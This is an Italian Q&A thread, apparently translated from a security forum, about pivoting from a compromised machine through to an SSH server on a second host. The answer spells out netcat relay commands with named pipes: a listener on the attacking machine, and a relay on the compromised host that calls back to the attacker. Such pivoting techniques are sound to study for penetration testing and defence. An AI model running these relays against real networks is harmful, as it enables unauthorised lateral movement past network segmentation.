Usa netcat su Pivot

2

Quindi ho una shell nella macchina A che non ha ssh installata e non posso avere una shell tty su (ho provato tutti i cheat sheet tty, penso che sia intenzionale)

Attraverso la macchina A posso vedere la macchina B che ha un server ssh in esecuzione sulla porta 2222.

Quello che mi piacerebbe fare è capire come usare netcat per connettersi a ssh manualmente o usare netcat per andare dal mio attacco alla macchina A alla macchina B.

Ho provato per la prima volta nc -lvp 444 -c 'nc machine.b 2222' ma non riesco a collegarmi alla macchina A, sto indovinando le regole del firewall.

Successivamente ho provato ad inoltrare la connessione alla mia macchina attaccante nc attacking.machine 444 -c 'nc machine.b 2222' che funziona, ma ho capito che una volta reindirizzata alla mia macchina attaccante, non posso accedere alla porta per connettermi ad essa con ssh.

Questo è il design della rete ... credo

    
posta Anthony Russell 04.07.2018 - 02:52
fonte

1 risposta

3

Okay, la risposta è usare un relay netcat. Ho trovato questo cheat sheet di Sans con alcuni fantastici comandi nc su di esso. Ho anche avuto un po 'di saggezza da @BetterSafteyNet che mi ha portato al PDF. Con i loro poteri combinati ho trovato la serie di comandi qui sotto per far funzionare questo.

Usando il diagramma originariamente pubblicato come legenda:

Per prima cosa imposta il relay listener sulla macchina attaccante

~$ cd /tmp; mknod backpipe p
~$ nc -lvp <listen port 1> 0<backpipe | nc -lvp <listen port 2> | tee backpipe

Quindi configura il client sul relay client sulla macchina A (la macchina pivot)

~$cd /tmp; mknod backpipe p 
~$nc <machine b ip> <ssh port> 0<backpipe | nc <attack machine ip> <listening port 1> | tee backpipe   

Infine, effettua la connessione SSH dalla macchina attaccante

~$ssh [email protected] -p <listen port 2>
    
risposta data 06.07.2018 - 01:09
fonte

Leggi altre domande sui tag